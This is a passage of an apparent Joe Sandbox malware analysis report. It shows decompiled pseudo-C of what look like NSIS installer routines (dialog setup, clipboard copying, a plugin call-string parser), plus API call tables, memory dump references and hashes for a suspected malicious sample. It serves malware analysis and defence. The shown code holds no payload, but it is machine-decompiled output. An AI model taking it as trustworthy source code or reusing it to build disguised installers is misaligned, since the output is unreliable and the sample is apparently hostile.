                                                              						}
                                                              						ShowWindow( *0x429230, _t156);
                                                              						ShowWindow(_t169, 8);
                                                              						E004045F9(_t169);
                                                              						goto L17;
                                                              					}
                                                              				}
                                                              				_v52 = _v52 | 0xffffffff;
                                                              				_v40 = _v40 | 0xffffffff;
                                                              				_t177 = 2;
                                                              				_v60 = _t177;
                                                              				_v56 = 0;
                                                              				_v48 = 0;
                                                              				_v44 = 0;
                                                              				asm("stosd");
                                                              				asm("stosd");
                                                              				_t130 =  *0x42a270;
                                                              				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                              				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                              				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                              				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                              				_t134 = GetDlgItem(_a4, 0x3f8);
                                                              				 *0x429244 = _t134;
                                                              				_v8 = _t134;
                                                              				E004045F9( *0x429230);
                                                              				 *0x429234 = E00404F52(4);
                                                              				 *0x42924c = 0;
                                                              				GetClientRect(_v8,  &_v28);
                                                              				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                              				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                              				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                              				if(_a8 >= 0) {
                                                              					SendMessageW(_v8, 0x1001, 0, _a8);
                                                              					SendMessageW(_v8, 0x1026, 0, _a8);
                                                              				}
                                                              				if(_a12 >= _t156) {
                                                              					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                              				}
                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                              				_push(0x1b);
                                                              				E004045C4(_a4);
                                                              				if(( *0x42a278 & 0x00000003) != 0) {
                                                              					ShowWindow( *0x429230, _t156);
                                                              					if(( *0x42a278 & 0x00000002) != 0) {
                                                              						 *0x429230 = _t156;
                                                              					} else {
                                                              						ShowWindow(_v8, 8);
                                                              					}
                                                              					E004045F9( *0x429228);
                                                              				}
                                                              				_t168 = GetDlgItem(_a4, 0x3ec);
                                                              				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                              				if(( *0x42a278 & 0x00000004) != 0) {
                                                              					SendMessageW(_t168, 0x409, _t156, _a12);
                                                              					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                              				}
                                                              				goto L36;
                                                              			}



































                                                              0x00405811
                                                              0x00405817
                                                              0x00405821
                                                              0x00405824
                                                              0x004059ba
                                                              0x004059d7
                                                              0x004059de
                                                              0x004059de
                                                              0x004059f1
                                                              0x00405a0f
                                                              0x00405a11
                                                              0x00405a19
                                                              0x00405a6f
                                                              0x00405a73
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a75
                                                              0x00405a7b
                                                              0x00000000
                                                              0x00000000
                                                              0x00405a85
                                                              0x00405a8d
                                                              0x00405a90
                                                              0x00405b92
                                                              0x00000000
                                                              0x00405b92
                                                              0x00405a9f
                                                              0x00405aaa
                                                              0x00405ab3
                                                              0x00405abe
                                                              0x00405ac1
                                                              0x00405aca
                                                              0x00405ad0
                                                              0x00405ad3
                                                              0x00405ad3
                                                              0x00405aeb
                                                              0x00405af4
                                                              0x00405af7
                                                              0x00405afe
                                                              0x00405b05
                                                              0x00405b0d
                                                              0x00405b0d
                                                              0x00405b24
                                                              0x00405b24
                                                              0x00405b2b
                                                              0x00405b31
                                                              0x00405b3d
                                                              0x00405b44
                                                              0x00405b4d
                                                              0x00405b4f
                                                              0x00405b52
                                                              0x00405b61
                                                              0x00405b64
                                                              0x00405b6a
                                                              0x00405b6b
                                                              0x00405b71
                                                              0x00405b72
                                                              0x00405b73
                                                              0x00405b7b
                                                              0x00405b86
                                                              0x00405b8c
                                                              0x00405b8c
                                                              0x00000000
                                                              0x00405aeb
                                                              0x00405a21
                                                              0x00405a51
                                                              0x00405a59
                                                              0x00405a5b
                                                              0x00405a64
                                                              0x00405a64
                                                              0x00405a6a
                                                              0x00000000
                                                              0x00405a6a
                                                              0x00405a25
                                                              0x00405a2f
                                                              0x00000000
                                                              0x004059f3
                                                              0x004059f9
                                                              0x00405a34
                                                              0x00000000
                                                              0x00405a3d
                                                              0x00405a02
                                                              0x00405a07
                                                              0x00405a0a
                                                              0x00000000
                                                              0x00405a0a
                                                              0x004059f1
                                                              0x0040582a
                                                              0x0040582e
                                                              0x00405836
                                                              0x0040583a
                                                              0x0040583d
                                                              0x00405840
                                                              0x00405843
                                                              0x00405846
                                                              0x00405847
                                                              0x00405848
                                                              0x00405861
                                                              0x00405864
                                                              0x0040586e
                                                              0x0040587d
                                                              0x00405885
                                                              0x0040588d
                                                              0x00405892
                                                              0x00405895
                                                              0x004058a1
                                                              0x004058aa
                                                              0x004058b3
                                                              0x004058d5
                                                              0x004058db
                                                              0x004058ec
                                                              0x004058f1
                                                              0x004058ff
                                                              0x0040590d
                                                              0x0040590d
                                                              0x00405912
                                                              0x00405920
                                                              0x00405920
                                                              0x00405925
                                                              0x00405928
                                                              0x0040592d
                                                              0x00405939
                                                              0x00405942
                                                              0x0040594f
                                                              0x0040595e
                                                              0x00405951
                                                              0x00405956
                                                              0x00405956
                                                              0x0040596a
                                                              0x0040596a
                                                              0x0040597e
                                                              0x00405987
                                                              0x00405990
                                                              0x004059a0
                                                              0x004059ac
                                                              0x004059ac
                                                              0x00000000

                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 00405867
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405876
                                                              • GetClientRect.USER32(?,?), ref: 004058B3
                                                              • GetSystemMetrics.USER32(00000002), ref: 004058BA
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                              • ShowWindow.USER32(?,00000008), ref: 00405956
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405977
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405885
                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004059C9
                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
                                                              • CloseHandle.KERNELBASE(00000000), ref: 004059DE
                                                              • ShowWindow.USER32(00000000), ref: 00405A02
                                                              • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                              • ShowWindow.USER32(00000008), ref: 00405A51
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                              • CreatePopupMenu.USER32 ref: 00405A96
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
                                                              • GetWindowRect.USER32(?,?), ref: 00405ACA
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                              • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                              • EmptyClipboard.USER32 ref: 00405B31
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                              • GlobalLock.KERNEL32(00000000), ref: 00405B47
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                              • CloseClipboard.USER32 ref: 00405B8C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: H7B${
                                                              • API String ID: 590372296-2256286769
                                                              • Opcode ID: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                              • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                                                              • Opcode Fuzzy Hash: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
                                                              • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E6F671BFF() {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				WCHAR* _v24;
                                                              				WCHAR* _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				signed int _v40;
                                                              				signed int _v44;
                                                              				WCHAR* _v48;
                                                              				signed int _v52;
                                                              				void* _v56;
                                                              				intOrPtr _v60;
                                                              				WCHAR* _t208;
                                                              				signed int _t211;
                                                              				void* _t213;
                                                              				void* _t215;
                                                              				WCHAR* _t217;
                                                              				void* _t225;
                                                              				struct HINSTANCE__* _t226;
                                                              				struct HINSTANCE__* _t227;
                                                              				struct HINSTANCE__* _t229;
                                                              				signed short _t231;
                                                              				struct HINSTANCE__* _t234;
                                                              				struct HINSTANCE__* _t236;
                                                              				void* _t237;
                                                              				intOrPtr* _t238;
                                                              				void* _t249;
                                                              				signed char _t250;
                                                              				signed int _t251;
                                                              				void* _t255;
                                                              				struct HINSTANCE__* _t257;
                                                              				void* _t258;
                                                              				signed int _t260;
                                                              				signed int _t261;
                                                              				signed short* _t264;
                                                              				signed int _t269;
                                                              				signed int _t272;
                                                              				signed int _t274;
                                                              				void* _t277;
                                                              				void* _t281;
                                                              				struct HINSTANCE__* _t283;
                                                              				signed int _t286;
                                                              				void _t287;
                                                              				signed int _t288;
                                                              				signed int _t300;
                                                              				signed int _t301;
                                                              				signed short _t304;
                                                              				void* _t305;
                                                              				signed int _t309;
                                                              				signed int _t312;
                                                              				signed int _t315;
                                                              				signed int _t316;
                                                              				signed int _t317;
                                                              				signed short* _t321;
                                                              				WCHAR* _t322;
                                                              				WCHAR* _t324;
                                                              				WCHAR* _t325;
                                                              				struct HINSTANCE__* _t326;
                                                              				void* _t328;
                                                              				signed int _t331;
                                                              				void* _t332;
                                                              
                                                              				_t283 = 0;
                                                              				_v32 = 0;
                                                              				_v36 = 0;
                                                              				_v16 = 0;
                                                              				_v8 = 0;
                                                              				_v40 = 0;
                                                              				_t332 = 0;
                                                              				_v52 = 0;
                                                              				_v44 = 0;
                                                              				_t208 = E6F6712BB();
                                                              				_v24 = _t208;
                                                              				_v28 = _t208;
                                                              				_v48 = E6F6712BB();
                                                              				_t321 = E6F6712E3();
                                                              				_v56 = _t321;
                                                              				_v12 = _t321;
                                                              				while(1) {
                                                              					_t211 = _v32;
                                                              					_v60 = _t211;
                                                              					if(_t211 != _t283 && _t332 == _t283) {
                                                              						break;
                                                              					}
                                                              					_t286 =  *_t321 & 0x0000ffff;
                                                              					_t213 = _t286 - _t283;
                                                              					if(_t213 == 0) {
                                                              						_t37 =  &_v32;
                                                              						 *_t37 = _v32 | 0xffffffff;
                                                              						__eflags =  *_t37;
                                                              						L20:
                                                              						_t215 = _v60 - _t283;
                                                              						if(_t215 == 0) {
                                                              							__eflags = _t332 - _t283;
                                                              							 *_v28 = _t283;
                                                              							if(_t332 == _t283) {
                                                              								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                              								_t332 = _t255;
                                                              								 *(_t332 + 0x1010) = _t283;
                                                              								 *(_t332 + 0x1014) = _t283;
                                                              							}
                                                              							_t287 = _v36;
                                                              							_t47 = _t332 + 8; // 0x8
                                                              							_t217 = _t47;
                                                              							_t48 = _t332 + 0x808; // 0x808
                                                              							_t322 = _t48;
                                                              							 *_t332 = _t287;
                                                              							_t288 = _t287 - _t283;
                                                              							__eflags = _t288;
                                                              							 *_t217 = _t283;
                                                              							 *_t322 = _t283;
                                                              							 *(_t332 + 0x1008) = _t283;
                                                              							 *(_t332 + 0x100c) = _t283;
                                                              							 *(_t332 + 4) = _t283;
                                                              							if(_t288 == 0) {
                                                              								__eflags = _v28 - _v24;
                                                              								if(_v28 == _v24) {
                                                              									goto L42;
                                                              								}
                                                              								_t328 = 0;
                                                              								GlobalFree(_t332);
                                                              								_t332 = E6F6713B1(_v24);
                                                              								__eflags = _t332 - _t283;
                                                              								if(_t332 == _t283) {
                                                              									goto L42;
                                                              								} else {
                                                              									goto L35;
                                                              								}
                                                              								while(1) {
                                                              									L35:
                                                              									_t249 =  *(_t332 + 0x1ca0);
                                                              									__eflags = _t249 - _t283;
                                                              									if(_t249 == _t283) {
                                                              										break;
                                                              									}
                                                              									_t328 = _t332;
                                                              									_t332 = _t249;
                                                              									__eflags = _t332 - _t283;
                                                              									if(_t332 != _t283) {
                                                              										continue;
                                                              									}
                                                              									break;
                                                              								}
                                                              								__eflags = _t328 - _t283;
                                                              								if(_t328 != _t283) {
                                                              									 *(_t328 + 0x1ca0) = _t283;
                                                              								}
                                                              								_t250 =  *(_t332 + 0x1010);
                                                              								__eflags = _t250 & 0x00000008;
                                                              								if((_t250 & 0x00000008) == 0) {
                                                              									_t251 = _t250 | 0x00000002;
                                                              									__eflags = _t251;
                                                              									 *(_t332 + 0x1010) = _t251;
                                                              								} else {
                                                              									_t332 = E6F67162F(_t332);
                                                              									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                              								}
                                                              								goto L42;
                                                              							} else {
                                                              								_t300 = _t288 - 1;
                                                              								__eflags = _t300;
                                                              								if(_t300 == 0) {
                                                              									L31:
                                                              									lstrcpyW(_t217, _v48);
                                                              									L32:
                                                              									lstrcpyW(_t322, _v24);
                                                              									goto L42;
                                                              								}
                                                              								_t301 = _t300 - 1;
                                                              								__eflags = _t301;
                                                              								if(_t301 == 0) {
                                                              									goto L32;
                                                              								}
                                                              								__eflags = _t301 != 1;
                                                              								if(_t301 != 1) {
                                                              									goto L42;
                                                              								}
                                                              								goto L31;
                                                              							}
                                                              						} else {
                                                              							if(_t215 == 1) {
                                                              								_t257 = _v16;
                                                              								if(_v40 == _t283) {
                                                              									_t257 = _t257 - 1;
                                                              								}
                                                              								 *(_t332 + 0x1014) = _t257;
                                                              							}
                                                              							L42:
                                                              							_v12 = _v12 + 2;
                                                              							_v28 = _v24;
                                                              							L59:
                                                              							if(_v32 != 0xffffffff) {
                                                              								_t321 = _v12;
                                                              								continue;
                                                              							}
                                                              							break;
                                                              						}
                                                              					}
                                                              					_t258 = _t213 - 0x23;
                                                              					if(_t258 == 0) {
                                                              						__eflags = _t321 - _v56;
                                                              						if(_t321 <= _v56) {
                                                              							L17:
                                                              							__eflags = _v44 - _t283;
                                                              							if(_v44 != _t283) {
                                                              								L43:
                                                              								_t260 = _v32 - _t283;
                                                              								__eflags = _t260;
                                                              								if(_t260 == 0) {
                                                              									_t261 = _t286;
                                                              									while(1) {
                                                              										__eflags = _t261 - 0x22;
                                                              										if(_t261 != 0x22) {
                                                              											break;
                                                              										}
                                                              										_t321 =  &(_t321[1]);
                                                              										__eflags = _v44 - _t283;
                                                              										_v12 = _t321;
                                                              										if(_v44 == _t283) {
                                                              											_v44 = 1;
                                                              											L162:
                                                              											_v28 =  &(_v28[0]);
                                                              											 *_v28 =  *_t321;
                                                              											L58:
                                                              											_t331 =  &(_t321[1]);
                                                              											__eflags = _t331;
                                                              											_v12 = _t331;
                                                              											goto L59;
                                                              										}
                                                              										_t261 =  *_t321 & 0x0000ffff;
                                                              										_v44 = _t283;
                                                              									}
                                                              									__eflags = _t261 - 0x2a;
                                                              									if(_t261 == 0x2a) {
                                                              										_v36 = 2;
                                                              										L57:
                                                              										_t321 = _v12;
                                                              										_v28 = _v24;
                                                              										_t283 = 0;
                                                              										__eflags = 0;
                                                              										goto L58;
                                                              									}
                                                              									__eflags = _t261 - 0x2d;
                                                              									if(_t261 == 0x2d) {
                                                              										L151:
                                                              										_t304 =  *_t321;
                                                              										__eflags = _t304 - 0x2d;
                                                              										if(_t304 != 0x2d) {
                                                              											L154:
                                                              											_t264 =  &(_t321[1]);
                                                              											__eflags =  *_t264 - 0x3a;
                                                              											if( *_t264 != 0x3a) {
                                                              												goto L162;
                                                              											}
                                                              											__eflags = _t304 - 0x2d;
                                                              											if(_t304 == 0x2d) {
                                                              												goto L162;
                                                              											}
                                                              											_v36 = 1;
                                                              											L157:
                                                              											_v12 = _t264;
                                                              											__eflags = _v28 - _v24;
                                                              											if(_v28 <= _v24) {
                                                              												 *_v48 = _t283;
                                                              											} else {
                                                              												 *_v28 = _t283;
                                                              												lstrcpyW(_v48, _v24);
                                                              											}
                                                              											goto L57;
                                                              										}
                                                              										_t264 =  &(_t321[1]);
                                                              										__eflags =  *_t264 - 0x3e;
                                                              										if( *_t264 != 0x3e) {
                                                              											goto L154;
                                                              										}
                                                              										_v36 = 3;
                                                              										goto L157;
                                                              									}
                                                              									__eflags = _t261 - 0x3a;
                                                              									if(_t261 != 0x3a) {
                                                              										goto L162;
                                                              									}
                                                              									goto L151;
                                                              								}
                                                              								_t269 = _t260 - 1;
                                                              								__eflags = _t269;
                                                              								if(_t269 == 0) {
                                                              									L80:
                                                              									_t305 = _t286 + 0xffffffde;
                                                              									__eflags = _t305 - 0x55;
                                                              									if(_t305 > 0x55) {
                                                              										goto L57;
                                                              									}
                                                              									switch( *((intOrPtr*)(( *(_t305 + 0x6f6723e8) & 0x000000ff) * 4 +  &M6F67235C))) {
                                                              										case 0:
                                                              											__ecx = _v24;
                                                              											__edi = _v12;
                                                              											while(1) {
                                                              												__edi = __edi + 1;
                                                              												__edi = __edi + 1;
                                                              												_v12 = __edi;
                                                              												__ax =  *__edi;
                                                              												__eflags = __ax - __dx;
                                                              												if(__ax != __dx) {
                                                              													goto L132;
                                                              												}
                                                              												L131:
                                                              												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                              												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                              													L136:
                                                              													 *__ecx =  *__ecx & 0x00000000;
                                                              													__eax = E6F6712CC(_v24);
                                                              													__ebx = __eax;
                                                              													goto L97;
                                                              												}
                                                              												L132:
                                                              												__eflags = __ax;
                                                              												if(__ax == 0) {
                                                              													goto L136;
                                                              												}
                                                              												__eflags = __ax - __dx;
                                                              												if(__ax == __dx) {
                                                              													__edi = __edi + 1;
                                                              													__edi = __edi + 1;
                                                              													__eflags = __edi;
                                                              												}
                                                              												__ax =  *__edi;
                                                              												 *__ecx =  *__edi;
                                                              												__ecx = __ecx + 1;
                                                              												__ecx = __ecx + 1;
                                                              												__edi = __edi + 1;
                                                              												__edi = __edi + 1;
                                                              												_v12 = __edi;
                                                              												__ax =  *__edi;
                                                              												__eflags = __ax - __dx;
                                                              												if(__ax != __dx) {
                                                              													goto L132;
                                                              												}
                                                              												goto L131;
                                                              											}
                                                              										case 1:
                                                              											_v8 = 1;
                                                              											goto L57;
                                                              										case 2:
                                                              											_v8 = _v8 | 0xffffffff;
                                                              											goto L57;
                                                              										case 3:
                                                              											_v8 = _v8 & 0x00000000;
                                                              											_v20 = _v20 & 0x00000000;
                                                              											_v16 = _v16 + 1;
                                                              											goto L85;
                                                              										case 4:
                                                              											__eflags = _v20;
                                                              											if(_v20 != 0) {
                                                              												goto L57;
                                                              											}
                                                              											_v12 = _v12 - 2;
                                                              											__ebx = E6F6712BB();
                                                              											 &_v12 = E6F671B86( &_v12);
                                                              											__eax = E6F671510(__edx, __eax, __edx, __ebx);
                                                              											goto L97;
                                                              										case 5:
                                                              											L105:
                                                              											_v20 = _v20 + 1;
                                                              											goto L57;
                                                              										case 6:
                                                              											_push(7);
                                                              											goto L123;
                                                              										case 7:
                                                              											_push(0x19);
                                                              											goto L143;
                                                              										case 8:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L107;
                                                              										case 9:
                                                              											_push(0x15);
                                                              											goto L143;
                                                              										case 0xa:
                                                              											_push(0x16);
                                                              											goto L143;
                                                              										case 0xb:
                                                              											_push(0x18);
                                                              											goto L143;
                                                              										case 0xc:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L118;
                                                              										case 0xd:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L109;
                                                              										case 0xe:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L111;
                                                              										case 0xf:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L122;
                                                              										case 0x10:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L113;
                                                              										case 0x11:
                                                              											_push(3);
                                                              											goto L123;
                                                              										case 0x12:
                                                              											_push(0x17);
                                                              											L143:
                                                              											_pop(__ebx);
                                                              											goto L98;
                                                              										case 0x13:
                                                              											__eax =  &_v12;
                                                              											__eax = E6F671B86( &_v12);
                                                              											__ebx = __eax;
                                                              											__ebx = __eax + 1;
                                                              											__eflags = __ebx - 0xb;
                                                              											if(__ebx < 0xb) {
                                                              												__ebx = __ebx + 0xa;
                                                              											}
                                                              											goto L97;
                                                              										case 0x14:
                                                              											__ebx = 0xffffffff;
                                                              											goto L98;
                                                              										case 0x15:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L116;
                                                              										case 0x16:
                                                              											__ecx = 0;
                                                              											__eflags = 0;
                                                              											goto L91;
                                                              										case 0x17:
                                                              											__eax = 0;
                                                              											__eax = 1;
                                                              											__eflags = 1;
                                                              											goto L120;
                                                              										case 0x18:
                                                              											_t271 =  *(_t332 + 0x1014);
                                                              											__eflags = _t271 - _v16;
                                                              											if(_t271 > _v16) {
                                                              												_v16 = _t271;
                                                              											}
                                                              											_v8 = _v8 & 0x00000000;
                                                              											_v20 = _v20 & 0x00000000;
                                                              											_v36 - 3 = _t271 - (_v36 == 3);
                                                              											if(_t271 != _v36 == 3) {
                                                              												L85:
                                                              												_v40 = 1;
                                                              											}
                                                              											goto L57;
                                                              										case 0x19:
                                                              											L107:
                                                              											__ecx = 0;
                                                              											_v8 = 2;
                                                              											__ecx = 1;
                                                              											goto L91;
                                                              										case 0x1a:
                                                              											L118:
                                                              											_push(5);
                                                              											goto L123;
                                                              										case 0x1b:
                                                              											L109:
                                                              											__ecx = 0;
                                                              											_v8 = 3;
                                                              											__ecx = 1;
                                                              											goto L91;
                                                              										case 0x1c:
                                                              											L111:
                                                              											__ecx = 0;
                                                              											__ecx = 1;
                                                              											goto L91;
                                                              										case 0x1d:
                                                              											L122:
                                                              											_push(6);
                                                              											goto L123;
                                                              										case 0x1e:
                                                              											L113:
                                                              											_push(2);
                                                              											goto L123;
                                                              										case 0x1f:
                                                              											__eax =  &_v12;
                                                              											__eax = E6F671B86( &_v12);
                                                              											__ebx = __eax;
                                                              											__ebx = __eax + 1;
                                                              											goto L97;
                                                              										case 0x20:
                                                              											L116:
                                                              											_v52 = _v52 + 1;
                                                              											_push(4);
                                                              											_pop(__ecx);
                                                              											goto L91;
                                                              										case 0x21:
                                                              											L120:
                                                              											_push(4);
                                                              											L123:
                                                              											_pop(__ecx);
                                                              											L91:
                                                              											__edi = _v16;
                                                              											__edx =  *(0x6f67405c + __ecx * 4);
                                                              											__eax =  ~__eax;
                                                              											asm("sbb eax, eax");
                                                              											_v40 = 1;
                                                              											__edi = _v16 << 5;
                                                              											__eax = __eax & 0x00008000;
                                                              											__edi = (_v16 << 5) + __esi;
                                                              											__eax = __eax | __ecx;
                                                              											__eflags = _v8;
                                                              											 *(__edi + 0x1018) = __eax;
                                                              											if(_v8 < 0) {
                                                              												L93:
                                                              												__edx = 0;
                                                              												__edx = 1;
                                                              												__eflags = 1;
                                                              												L94:
                                                              												__eflags = _v8 - 1;
                                                              												 *(__edi + 0x1028) = __edx;
                                                              												if(_v8 == 1) {
                                                              													__eax =  &_v12;
                                                              													__eax = E6F671B86( &_v12);
                                                              													__eax = __eax + 1;
                                                              													__eflags = __eax;
                                                              													_v8 = __eax;
                                                              												}
                                                              												__eax = _v8;
                                                              												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                              												_t136 = _v16 + 0x81; // 0x81
                                                              												_t136 = _t136 << 5;
                                                              												__eax = 0;
                                                              												__eflags = 0;
                                                              												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                              												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                              												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                              												L97:
                                                              												__eflags = __ebx;
                                                              												if(__ebx == 0) {
                                                              													goto L57;
                                                              												}
                                                              												L98:
                                                              												__eflags = _v20;
                                                              												_v40 = 1;
                                                              												if(_v20 != 0) {
                                                              													L103:
                                                              													__eflags = _v20 - 1;
                                                              													if(_v20 == 1) {
                                                              														__eax = _v16;
                                                              														__eax = _v16 << 5;
                                                              														__eflags = __eax;
                                                              														 *(__eax + __esi + 0x102c) = __ebx;
                                                              													}
                                                              													goto L105;
                                                              												}
                                                              												_v16 = _v16 << 5;
                                                              												_t144 = __esi + 0x1030; // 0x1030
                                                              												__edi = (_v16 << 5) + _t144;
                                                              												__eax =  *__edi;
                                                              												__eflags = __eax - 0xffffffff;
                                                              												if(__eax <= 0xffffffff) {
                                                              													L101:
                                                              													__eax = GlobalFree(__eax);
                                                              													L102:
                                                              													 *__edi = __ebx;
                                                              													goto L103;
                                                              												}
                                                              												__eflags = __eax - 0x19;
                                                              												if(__eax <= 0x19) {
                                                              													goto L102;
                                                              												}
                                                              												goto L101;
                                                              											}
                                                              											__eflags = __edx;
                                                              											if(__edx > 0) {
                                                              												goto L94;
                                                              											}
                                                              											goto L93;
                                                              										case 0x22:
                                                              											goto L57;
                                                              									}
                                                              								}
                                                              								_t272 = _t269 - 1;
                                                              								__eflags = _t272;
                                                              								if(_t272 == 0) {
                                                              									_v16 = _t283;
                                                              									goto L80;
                                                              								}
                                                              								__eflags = _t272 != 1;
                                                              								if(_t272 != 1) {
                                                              									goto L162;
                                                              								}
                                                              								__eflags = _t286 - 0x6e;
                                                              								if(__eflags > 0) {
                                                              									_t309 = _t286 - 0x72;
                                                              									__eflags = _t309;
                                                              									if(_t309 == 0) {
                                                              										_push(4);
                                                              										L74:
                                                              										_pop(_t274);
                                                              										L75:
                                                              										__eflags = _v8 - 1;
                                                              										if(_v8 != 1) {
                                                              											_t96 = _t332 + 0x1010;
                                                              											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                              											__eflags =  *_t96;
                                                              										} else {
                                                              											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                              										}
                                                              										_v8 = 1;
                                                              										goto L57;
                                                              									}
                                                              									_t312 = _t309 - 1;
                                                              									__eflags = _t312;
                                                              									if(_t312 == 0) {
                                                              										_push(0x10);
                                                              										goto L74;
                                                              									}
                                                              									__eflags = _t312 != 0;
                                                              									if(_t312 != 0) {
                                                              										goto L57;
                                                              									}
                                                              									_push(0x40);
                                                              									goto L74;
                                                              								}
                                                              								if(__eflags == 0) {
                                                              									_push(8);
                                                              									goto L74;
                                                              								}
                                                              								_t315 = _t286 - 0x21;
                                                              								__eflags = _t315;
                                                              								if(_t315 == 0) {
                                                              									_v8 =  ~_v8;
                                                              									goto L57;
                                                              								}
                                                              								_t316 = _t315 - 0x11;
                                                              								__eflags = _t316;
                                                              								if(_t316 == 0) {
                                                              									_t274 = 0x100;
                                                              									goto L75;
                                                              								}
                                                              								_t317 = _t316 - 0x31;
                                                              								__eflags = _t317;
                                                              								if(_t317 == 0) {
                                                              									_t274 = 1;
                                                              									goto L75;
                                                              								}
                                                              								__eflags = _t317 != 0;
                                                              								if(_t317 != 0) {
                                                              									goto L57;
                                                              								}
                                                              								_push(0x20);
                                                              								goto L74;
                                                              							} else {
                                                              								_v32 = _t283;
                                                              								_v36 = _t283;
                                                              								goto L20;
                                                              							}
                                                              						}
                                                              						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                              						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                              							goto L17;
                                                              						}
